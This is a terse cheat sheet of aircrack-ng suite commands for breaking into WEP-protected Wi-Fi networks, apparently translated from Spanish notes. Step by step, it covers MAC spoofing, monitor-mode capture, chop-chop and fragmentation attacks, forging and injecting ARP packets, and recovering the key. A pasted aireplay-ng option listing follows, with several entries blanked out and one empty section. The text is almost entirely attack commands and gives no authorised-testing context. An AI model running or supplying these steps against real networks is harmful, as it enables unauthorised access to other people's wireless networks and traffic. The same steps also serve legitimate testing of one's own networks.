OPEN IN WINDOW 1:

View networks:
>>iwconfig => view installed cards
>>ifconfig => view active cards

Enable/disable cards:
>>ifconfig [interfaz] up/down

Enable/disable monitor mode:
>>airmon-ng start [interfaz]
>>airmon-ng stop [interfaz]

Enable/disable cards:
>>ifconfig [interfaz] up/down

Change MAC:
>>macchanger -m MACNUEVA [interfaz]

Enable/disable cards:
>>ifconfig [interfaz] up/down

MONITORING:
airodump-ng [interfaz]
airodump-ng --encrypt TIPODECIFRADO [interfaz]
STOP WITH CTRL+C

Targeted monitoring:
>>airodump-ng -c CANAL --bssid BSSID -w NOMBRECAPTURA [interfaz]

OPEN IN WINDOW 2:

Fake association:


OPEN IN WINDOW 3:

Chop Chop attack:
>>aireplay-ng -4 -h MACNUESTRA -b BSSID [interfaz]
y = yes
n = no
~NOTE: fragmentation attack: -5

Find the network IP:
>>tcpdump -s 0 -n -e -r ARCHIVO.CAP

Forge an ARP packet:
>>packetforge-ng -0 -a BSSID -h MACNUESTRA -k IP_DEL_AP -l IP_DEL_RANGO -y ARCHIVO.XOR -w NOMBRE_PAQUETE_QUE_QUERAMOS
(-l is a lowercase letter L)
NOTE: -k: => by default; -l: => by default

Inject the FORGED ARP packet:
>>aireplay-ng -2 -x 1024 -h MACNUESTRA -r ARCHIVO_ARP [interfaz]
(x takes values between 0 and 1024)

OPEN IN WINDOW 4:

Get the key:
>>aircrack-ng NOMBRECAPTURA_01.cap

If there are clients connected => we do not apply chop-chop

*ARP packet re-injection


Filter options:

    -b bssid  : MAC address, Access Point
    -d dmac   : MAC address, Destination
    -s smac   : MAC address, Source
    -m len    : minimum packet length
    -n len    : maximum packet length
    -u type   : frame control, type field
    -v subt   : frame control, subtype field
    -t tods   : frame control, To DS bit
    -f fromds : frame control, From DS bit
    -w iswep  : frame control, WEP bit
    -D        : disable AP detection

Replay options:

    -x nbpps  : number of packets per second
    -p fctrl  : set frame control word (hex)
    -a bssid  : set Access Point MAC address
    -c dmac   : set Destination MAC address
    -h smac   : set Source MAC address
    -g value  : change ring buffer size (default: 8)
    -F        : choose first matching packet

Fakeauth attack options:

    -e essid  : set target AP SSID
    -o npckts : number of packets per burst (0=auto, default: 1)
    -q sec    : seconds between keep-alives
    -y prga   : keystream for shared key auth
    -T n      : exit after retry fake auth request n time

Arp Replay attack options:

              : inject FromDS packets

Fragmentation attack options:

    -k IP     : set destination IP in fragments
    -l IP     : set source IP in fragments

Test attack options:

              : activates the bitrate test

Source options:

    -i iface  : capture packets from this interface
    -r file   : extract packets from this pcap file

Miscellaneous options:

              : disable /dev/rtc usage

Attack modes (numbers can still be used):

             count    : deauthenticate 1 or all stations (-0)
    --fakeauth delay  : fake authentication with AP (-1)
    --interactive     : interactive frame selection (-2)
    --arpreplay       : standard ARP-request replay (-3)
    --chopchop        : decrypt/chopchop WEP packet (-4)
    --fragment        : generates valid keystream (-5)
    --caffe-latte     : query a client for new IVs (-6)
    --cfrag           : fragments against a client (-7)
    --test            : tests injection and quality (-9)

    --help            : Displays this usage screen

>>aireplay-ng -3 -b BSSID -h MACNUESTRA -h MAC_DEL_CLIENTE_ASOCIADO [interfaz]